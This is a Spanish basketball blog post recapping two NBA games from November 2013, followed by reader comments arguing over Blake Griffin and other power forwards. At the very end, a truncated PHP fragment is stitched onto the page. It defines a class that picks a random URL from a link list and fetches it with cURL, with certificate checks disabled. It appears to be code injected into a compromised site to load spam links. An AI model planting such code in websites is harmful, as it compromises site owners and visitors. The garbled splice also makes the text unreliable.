La Crónica: Más récord, menos premio

22 de November de 2013 por TheDeerHunter

Los Angeles Clippers visitaban Oklahoma City con un doble objetivo. Primero, superar a los Thunder en la clasificación y segundo, sumar otro doble-doble consecutivo al récord que viene amasando Chris Paul. Lo del récord se conseguía con cierta facilidad pero lo de ganar de visitante en el, hasta ahora inexpugnable, Chesapeake Arena es otra canción muy distinta y más viniendo de “back to back”. Durant y los Thunder siguen siendo un bicho a tener en cuenta, por más que se les haya apartado un poco del cartel de favoritos de la conferencia. Anoche mantuvieron su línea de 29 tiros libres lanzados (y no estuvieron muy aceertados) con Durant abusando de Jared Dudley (con Barnes pendiente de operarse el ojo) y, cuidado, un desempeño extraordinario de la banca, con Reggie Jackson, Jeremy Lamb y Steve Adams destacados. Es un mal día para mencionar aquello de la profundidad de plantilla de los Clippers (o la falta de la misma, que también comentamos acerca de los Thunder) pero muy bueno para observar la evolución del juego de Blake Griffin, que firmó una actuación fabulosa en un bonito duelo contra Serge Ibaka (91-105).

Los Bulls comenzaban anoche una gira de 6 partidos en Denver. No pudieron empezar peor y ya empieza a ser preocupante lo suyo fuera de casa. A este ritmo el batacazo en la clasificación cuando la terminen puede ser terrible. Anoche fue verdaderamente lamentable su efectividad en ataque. Mención a parte el suplicio de los tiros libres que, en este caso, fue compartido por los Nuggets. En un choque raro y bastante feo la racha de triples de los locales supuso la victoria, destacando entre todos a Jordan Hamilton. También resultaron útiles los 10 taponcitos que colocaron (87-97). Un último apunte para los románticos: Andre Miller se colocó 9º en la lista de asistencias de todos los tiempos sobrepasando a Rod Strickland. Uno hubiera jurado que ya le habría superado hace tiempo. Ninguno de los 2 jugadores han disputado nunca un All-Star Game. ¿Injusto? 

PREMIOS

MVP: Kevin Durant, como quiso y cuando quiso, también en su mejor versión distribuidora. 28 puntos, 8 asistencias y 6 rebotes.

Rookie: Steven Adams es una de las grandes sorpresas de los Thunder este año. Ayer aportó 6 puntos, 7 rebotes, 3 tapones y 2 asistencias. Kedrick Perkins tiene sus horas de titular contadas.

Sorpresa:  Jordan Hamilton, la punta de lanza de anoche de los corales Nuggets. 17 puntos con 3 triples y 6 rebotes.

Decepción: Luol Deng, que había tenido un rendimiento muy regular durante este inicio de curso. Anoche acabó con un 3 de 18 en tiro que lastró a su equipo.

Esfuerzo en vano: Blake Griffin mostrando todo lo que le pedimos. Lanzamiento a media distancia, juego al poste y, de postre, buena circulación de balón. 27 puntos con buenos porcentajes, 10 rebotes, 5 asistencias y 2 robos.

Imágenes | AP Photos / Getty Images

Comenta

25 comentarios a esta entrada

  1. Vader dice:
    #1

    Os juro que quería escribir este comentario ayer, porque hoy parecerá ventajista, pero no me dejaba abrir la página.

    Hay que reconocer la evolución, ahora ya evidente, en el juego de Blake Griffin. Ha mejorado en el tiro de media, defiende duro y mejor y sigue reboteando muy bien. Esta claro que es un jugador que depende mucho de su físico pero mientras este le aguanté a este nivel es un jugador muy importante y ahora mismo al nivel de los Aldridge, Love, etc…

    Saludos

      Citar

  2. Jose Luis dice:
    #2

    No veo yo a Griffin en unos Blazers aportando como Aldridge, ni en unos Wolves como Love.

      Citar

  3. TheDeerHunter dice:
    #3

    Griffin está jugando acojonantemente bien. Las comparaciones habrá que hacerlas en la cancha y no sale tan mal parado de esos duelos.
    Ahora mismo Aldridge está dulce, dulce y es difícil discutirle nada. Love algo más irregular que los otros dos y el equipo pasando un bache extraño, aunque también más brillante que nadie por momentos.

    A la espera de dónde van a estar metidos los Pelicans, estos 3 y Davis son los mejores 4 de la liga ahora mismo.

      Citar

  4. Viva_Dirk dice:
    #4

    Yo tampoco veo a Aldridge y Love defender al poste como lo hace Griffin, y eso que pone poquísimos tapones, pero defendiendo con los pies en el suelo es muy bueno, y a media distancia también.

    La temporada de Griffin es muy buena, cada partido es mejor jugador.

      Citar

  5. Heineken dice:
    #5

    Love directamente no defiende xD

      Citar

  6. Simon dice:
    #6

    Es eso, Love directamente se coloca para coger el rebote XD XD.
    Para mi Aldridge lleva ya un par de años siendo el mejor Ala-Pívot de la liga, desde el bajón de Dirk el fue quien ocupó su puesto pues Bosh cada año se ha ido diluyendo entre Wade y Lebron. Debería llevar por lo menos dos all-star ya y aún no lo ha sido, este año supongo que por fin se subsanará esto.

      Citar

  7. Esteban dice:
    #7

    por lo poco que vi del partido de anoche, Griffin mejora sus estadísticas, por que los clippers no solo son peores que el año pasado, son mucho peores en plantel, y ahora toma mas tiros y solo eso (sus porcentajes no son nada del otro mundo y en rebotes cada 36 minutos, apenas esta por encima de la media), su impacto en la cancha no es el que dicen sus números, ayer 27 puntos que solo sirvieron para no perder por 20, pero que en ningún momento fueron una amenaza seria para el Thuner que tuvo el partido muy controlado

    sobre los clippers y LO MUCHO QUE HAN MEJORADO ESTE AÑO, insisto, Jamison sigue sin jugar un minuto, Mullens ayer jugo 3, y su aporte viene de mal en peor (Los Clippers estan buscando a ODOM nuevamente), Dudley sigue jugando a reglamento, y Reddick, pasado su gran inicio de temporada ha bajado sus prestaciones
    Collison, hoy por hoy, esta lejos de poder discutir si esta entre los mejores bases suplentes de la competicion

    como se intuia antes del inicio, Paul es suficientemente bueno como para que los Clippers hagan una buena RS, pero no los veo nada bien en PO,

    quiza hay que darles tiempo y esperar que la mano de Doc se vea mucho mas

      Citar

  8. GreenPride dice:
    #8

    Partido decepcionante por parte de los Clippers que en nigún momento dieron la impresión de poder ganar. CP3 y Griffin muy solos ante unos Thunder que van encontrando la producción de su banquillo con Lamb, Adams, Collison y Jackson aportando en los minutos de descanso de Durantula y Westbrook. ¿De verdad no se puede engañar a nadie para mandarles a Perkins a cambio de un 2 anotador? Si lo hicieran para mí subirían como la espuma los Thunder en sus opciones al anillo. Si no, una vez visto como contribuye Adams, la amnistia para Perk y a buscar este verano es algo ya inevitable ¿no creeis? A parte de ello, hasta que Rivers no consiga que sus Clippers defiendan algo yo no puedo considerarles candidatos a nada.

      Citar

  9. Denise dice:
    #9

    Esteban:

    sobre los clippers y LO MUCHO QUE HAN MEJORADO ESTE AÑO,insisto, Jamison sigue sin jugar un minuto, Mullens ayer jugo 3, y su aporte viene de mal en peor (Los Clippers estan buscando a ODOM nuevamente), Dudley sigue jugando a reglamento, y Reddick, pasado su gran inicio de temporada ha bajado sus prestaciones
    Collison, hoy por hoy, esta lejos de poder discutir si esta entre los mejores bases suplentes de la competicion

    como se intuia antes del inicio, Paul es suficientemente bueno como para que los Clippers hagan una buena RS, pero no los veo nada bien en PO,

    quiza hay que darles tiempo y esperar que la mano de Doc se vea mucho mas

    Pero Esteban por qué haces este comentario precisamente hoy? Después de un partido durisimo contra los Wolves, esperabas que los Clippers jugasen al 100% contra los Thunder? Joder, que vienen de jugar el dia anterior…y ya no solo el back-to-back sino echale un vistazo al calendario DURISIMO que han tenido los Clippers en este inicio de temporada.
    El 8-5 que llevan me parece un magnifico balance en función del calendario que han tenido, por ejemplo, sin quitar merito a los Spurs, el 10-1 que llevan me parece un balance muy engañoso porque el calendario ha sido muy faciñón hasta la fecha para los texanos.

    Tratas a Redick, Mullens, Dudley y los demas jugadores como si tuviesen la obligación de meter 20 puntos en cada partido, ¿te has fijado en lo que aportan otros complementos de equipos contenders? Macho, la tienes tomada con este equipo. Macho, que hicieron Billups, Odom, Butler ó Grant Hill el año pasado…leyendote parece como si los Clippers se hubiesen desprendido de 4 All-Stars del 2013 y en su lugar hubiesen venido 4 paquetes.

      Citar

  10. Denise dice:
    #10

    GreenPride:
    Partido decepcionante por parte de los Clippers que en nigún momento dieron la impresión de poder ganar. CP3 y Griffin muy solos ante unos Thunder que van encontrando la producción de su banquillo con Lamb, Adams, Collison y Jackson aportando en los minutos de descanso de Durantula y Westbrook. ¿De verdad no se puede engañar a nadie para mandarles a Perkins a cambio de un 2 anotador? Si lo hicieran para mí subirían como la espuma los Thunder en sus opciones al anillo. Si no, una vez visto como contribuye Adams, la amnistia para Perk y a buscar este verano es algo ya inevitable

    Ese 2 que necesitan es claramente Afflalo. El GM de los Thunder debería lanzarse a lo bestia por él.
    Ibaka + Lamb por Afflalo y Glen Davis

      Citar

  11. Simon dice:
    #11

    Esteban no seré yo quien defienda a los Clippers pues es un equipo que por lo que sea me cae mal… pero te suenan de algo los 1400 o 1500 km que deben separar Minnesota de Oklahoma???
    Aparte de eso, como bien dice Denise creo que simplemente la has cogido con este equipo y simplemente le arreas palos sin sentido… porque no entiendo a que viene decir eso de Griffin hoy, que precisamente se ha marcado un partidazo, es que sinceramente, yo no entré en la guerra que se desató la semana pasada, pero es que con esos comentarios te estás retratando tio… estas defendiendo lo indefendible. Para mi Griffin sólo no iría a ningún sitio pero es que hablas de él como si fuera un jugador del montón cuando tampoco es eso.
    Por cierto Clippers ha jugado todos sus partidos hasta ahora contra equipos presumiblemente de PO… excepto uno contra Magic creo y los derbis contra Lakers que por rivalidad son partidos durísimos tambien a pesar del nivel del equipo.

      Citar

  12. Denise dice:
    #12

    Simon:
    … excepto uno contra Magiccreo y los derbis contra Lakers que por rivalidad son partidos durísimos tambien a pesar del nivel del equipo.

    Y esos dos partidos “faciles” los han perdido, por cierto..

      Citar

  13. Vader dice:
    #13

    Lo de amnistiar a Perkins iros olvidando porque creo que el verano pasado era el último en que se podía usar la amnistia.

    Saludos

      Citar

  14. HisRoyalAirness dice:
    #14

    Para mí los mejores 4 de la temporado están siendo Love y Davis.
    Lo de Griffin es que si lo comparo con los otros doa me parece un jetas. Me explico, Anthony Davis ya ha mejorado sólo con respecto al año, tiene varios recursos en el poste, tiro de mediay una actitud defensiva espectacular. Y lo mejor de todo es que tira un 87% en TL y tiene veinte años!! Con esos brazos inmensos a veces veo algo de Duncan en él.

    Kevin Love, por otra parte, ha esculpido su cuerpo año tras año, ha mejorado su tiro hasta ser una absoluta referencia y bajo el aro y en el poste bajo, sin demasiadas virguerías, es de lo más eficaz que hay. Y sí que defiende pero muchas veces evita ciertos contactos porque Minny es bastante poco respetada por los árbitros.

    Y Griffin es un talentazo descomunal dentro de un físico mitad Lebron, Mitad Dominique. Pero pasa de todo. Y lo que nos sangra a todos es eso. Llegados los playoffs si no puedes jugar en el poste y obligar a que te haga doble teams todo va a depender de Paul.

    Ah y Griffin juega en el mejor equipo de los 3 de largo

      Citar

  15. Viva_Dirk dice:
    #15

    Griffin ha mejorado considerablemente su tiro y es mucho mejor defensor que Love.

      Citar

  16. rumbero dice:
    #16

    Esteban:
    por lo poco que vi del partido de anoche, Griffin mejora sus estadísticas, por que los clippers no solo son peores que el año pasado, son mucho peores en plantel, y ahora toma mas tiros y solo eso (sus porcentajes no son nada del otro mundo y en rebotes cada 36 minutos, apenas esta por encima de la media), su impacto en la cancha no es el que dicen sus números

    Me fascinan tus interpretaciones de las estadísticas. De Griffin podrás decir que no tiene el rango de tiro de Love o los movimientos de Aldridge pero es un tío que mete más de la mitad de los tiros que intenta. Que si todo son mates, que si jugando cerca del aro claro… lo cierto es que sólo hay 4 jugadores que metan más de 15 puntos por partido con mejor % que su 0.56 que son Brook Lopez, Hilario, Bosh y Ryan Anderson (que ha jugado dos partidos y lleva un 62% 3P) Está tirando más si, pero con más repertorio y mejor que nunca. Que a mi me gustan más Love e incluso Davis y luego vendrán los PO y ya habrá tiempo de rajar, pero si ya no le damos ningun mérito a un sólido 20-10 que encima está haciendo muchas de las cosas que le pedíamos y es la segunda espada de un equipo ganador que presumiblemente es una auténtica mierda es que no queremos ver más allá

      Citar

  17. Schize dice:
    #17

    Rumbero, me temo que pierdes el tiempo. Ni aunque Griffin se hiciera un 40-15 partido si y partido también, ganara 5 anillos y 8 MVPs dominando la liga conseguiría arrancar algún halago de Esteban. Es lo que hay xD
    Ya en serio, Griffin no podrá liderar un equipo ni ser jugador franquicia, pero puede mirarle a la cara a cualquier 4 de la liga, incluidos los que comentáis. Es un gran jugador y que además está mostrando mejorías.

      Citar

  18. TheDeerHunter dice:
    #18

    ¿En serio estoy leyendo que más de un 56% en tiro? Nadaaa… hay hasta 9 jugadores por encima suyo, será que sólo machaca XD XD XD
    Y después, visto el partido de ayer… y en general lo que ha jugado este año. ¿De dónde nos sacamos que pasa de todo?

    En fin… que lo que digáis. Qué le vamos a hacer.

      Citar

  19. HisRoyalAirness dice:
    #19

    TheDeerHunter:
    ¿En serio estoy leyendo que más de un 56% en tiro? Nadaaa… hay hasta 9 jugadores por encima suyo, será que sólo machaca XD XD XD
    Y después, visto el partido de ayer… y en general lo que ha jugado este año. ¿De dónde nos sacamos que pasa de todo?

    En fin… que lo que digáis. Qué le vamos a hacer.

    Deer, con lo de que “pasa de todo” me refiero a que es el 60% del jugador que podría ser. No atrae a rivales en el poste y eso en Playoffs es irte para casa pronto. Ojalá empiece a hacerlo y veamos la bestialidad de jugador que puede ser.
    Y en el tiro (no en porcentaje de tiro de campo) yo no lo he visto ninguna mejora pero tampoco he visto todos los partidos

      Citar

  20. Esteban dice:
    #20

    Schize: metan más de 15 puntos por partido con mejor % que su 0.56 que son Brook Lopez, Hilario, Bosh y Ryan Anderson (que ha jugado dos partidos y lleva un 62% 3P) Está tirando más si, pero con más repertorio y mejor que nunca. Que a mi me gustan más Love e incluso Davis y luego vendrán los PO y ya habrá tiempo de rajar, pero si ya no le damos ningun mérito a un sólido 20-10 que encima está haciendo muchas de las cosas que le pedíamos y es la segunda espada de un equipo ganador que presumiblemente es una auténtica mierda es que no queremos ver más allá

      Citar

    bueno sin duda si hiciera esos numeros lo halagaria, pero el caso es que esta lejos de hacerlo y de ganar esos galardones, para llegar a esos numeros, le faltan 17 puntos por partido y 5 rebotes, ademas de 5 anillos y 8 MVP, es decir, lo suyo esta lejos de ser tan grandioso, sino nadie lo discutiria

    en fin, opinio de los clippers por que al parecer y en este blog, todos hablan de su enorme rendimiento y lo mejor que son y no lo veo asi

    para mi, el año pasado Butler fue mejor que lo que esta siendo Dudley, en defensa y ademas de sacar su propio tiro en muchisimos partidos y ofensivas estacionadas; es cierto que era un tio de hoy 29 puntos, mañana 2, paso 25 y pasado 4, pero el tiempo que estuvo en LA rindio de manera eficiente

    lo de Bledsoe, creo que nadie duda que se extraña en comparacion con un arranque hartamente desilucionante de Collison, no?

    que hizo odom, fallo todos sus tiro a boca de jarro, pero bajo 10 rebotes cada 36 minutis, es muchisimo mas que lo que estan aportando Mulles y Jamison, hasta a Turiaf tenian el año pasado

    no se, yo no los veo lo suficientemente bien para PO, pero es solo una opinion , no hos sulfureis

      Citar

  21. Denise dice:
    #21

    Esteban: bueno sin duda si hiciera esos numeros lo halagaria, pero el caso es que esta lejos de hacerlo y de ganar esos galardones, para llegar a esos numeros, le faltan 17 puntos por partido y 5 rebotes, ademas de 5 anillos y 8 MVP, es decir, lo suyo esta lejos de ser tan grandioso, sino nadie lo discutiria

    en fin, opinio de los clippers por que al parecer y en este blog, todos hablan de su enorme rendimiento y lo mejor que son y no lo veo asi

    para mi, el año pasado Butler fue mejor que lo que esta siendo Dudley, en defensa y ademas de sacar su propio tiro en muchisimos partidos y ofensivas estacionadas; es cierto que era un tio de hoy 29 puntos, mañana 2, paso 25 y pasado 4, pero el tiempo que estuvo en LA rindio de manera eficiente

    lo de Bledsoe, creo que nadie duda que se extraña en comparacion con un arranque hartamente desilucionante de Collison, no?

    que hizo odom, fallo todos sus tiro a boca de jarro, pero bajo 10 rebotes cada 36 minutis, es muchisimo mas que lo que estan aportando Mulles y Jamison, hasta a Turiaf tenian el año pasado

    no se, yo no los veo lo suficientemente bien para PO, pero es solo una opinion , no hos sulfureis

    Ok, son tus opiniones, no estoy de acuerdo pero las respeto.

    Pero macho, la comparación de Bledsoe con Collison no se sostiene por ningun sitio. Es absurda. Todo el mundo sabe que Bledsoe es mejor que Collison, la cuestión es que Clippers no lo podía renovar si no quería verse con una masa salarial desorbitada. Y Collison esta fenomenal para cobrar 1’9 millones de dolares.

    En cierta manera, sería como putear a Xavier Henry por no meter los 30 puntos que mete Kobe.

      Citar

  22. Esteban dice:
    #22

    Denise: Ok, son tus opiniones, no estoy de acuerdo pero las respeto.

    Pero macho, la comparación de Bledsoe con Collison no se sostiene por ningun sitio. Es absurda. Todo el mundo sabe que Bledsoe es mejor que Collison, la cuestión es que Clippers no lo podía renovar si no quería verse con una masa salarial desorbitada. Y Collison esta fenomenal para cobrar 1’9 millones de dolares.

    En cierta manera, sería como putear a Xavier Henry por no meter los 30 puntos que mete Kobe.

    bueno, pero sea por cuestiones economicas o por las que fueran, entonces los clippers tienen menos equipo que el año pasado no? ok, no les quedaba otra, pero esa excusa no los hace mejores

      Citar

  23. Esteban dice:
    #23

    Denise:

    En cierta manera, sería como putear a Xavier Henry por no meter los 30 puntos que mete Kobe.

    seria un estupido si no reconociera que por lo que cobra y por los antecedentes que traia Henry, no reconociera que esta jugando a un nivel inesperado y que esta jugando excelente, peo tambien seria un estupido si creyera que por eso es mejor que Kobe

    bien por Henry, pero aun asi los lakers son peores con el que con Kobe

    bien por collison, por ese precio es una ganga, pero aun asi, los Clippers son peores con el que con Bledsoe

    se entiende el planteo?

      Citar

  24. Viva_Dirk dice:
    #24

    Mullens hace 14-7 por 36 minutos, vaya crack.

      Citar

  25. Esteban dice:
    #25

    Viva_Dirk:
    Mullens hace 14-7 por 36 minutos, vaya crack.

    por 36 minutos no son numeros nada impresionante, sin ir mas lejos Deandre Jordan por 36 minutos promedia 15 rebotes

    la estadistica cada 36 minutos infla mucho los numeros, y los de mullens, bueno no se ven tan bien no?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>